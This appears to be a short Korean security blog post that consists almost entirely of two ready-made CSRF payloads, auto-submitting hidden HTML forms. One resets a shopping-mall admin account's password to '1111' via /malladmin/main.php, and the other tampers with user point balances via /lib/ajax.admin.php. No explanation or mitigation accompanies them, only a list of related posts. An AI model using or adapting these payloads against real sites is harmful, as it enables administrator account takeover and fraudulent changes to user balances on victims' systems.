관리자 비밀번호 변경 공격
<body onload="document.s_form.submit();">
<form name="s_form" id="s_form" action="/malladmin/main.php"
method="post" onSubmit='return install_check(this);'>
<input type="hidden" name="menushow" value="menu1">
<input type="hidden" name="theme" value="basicconfig/basic_info2">
<input type="hidden" name="action" value="admin_save">
<input type="hidden" value="admin" name="ID"/>
<input type="hidden" value="admin" name="ADMIN_NAME" />
<input type="hidden" value="1111" name="PASS" />
<input type="hidden" value="1111" name="PASS1" />
</form>
포인터 변조 공격
<body onload="document.csrf.submit();">
<form name="csrf" action='/lib/ajax.admin.php' method="post">
<input type="hidden" name="query" value="update">
<input type="hidden" name='oldid' value='hackhack12'>
<input type="hidden" name="smode" value="in_point">
<input type="hidden" value="userid" name="hackhack12"/>
<input type="hidden" value="point" name="9999" />
<input type="hidden" value="type" name="point" />
</form>
'Web' 카테고리의 다른 글
| file download (0) | 2014.11.10 |
|---|---|
| webshell and defense of it (0) | 2014.11.06 |
| CSRF (0) | 2014.11.04 |
| advanced web (0) | 2014.10.30 |
| tools and searching vulnerabilities (0) | 2014.10.29 |
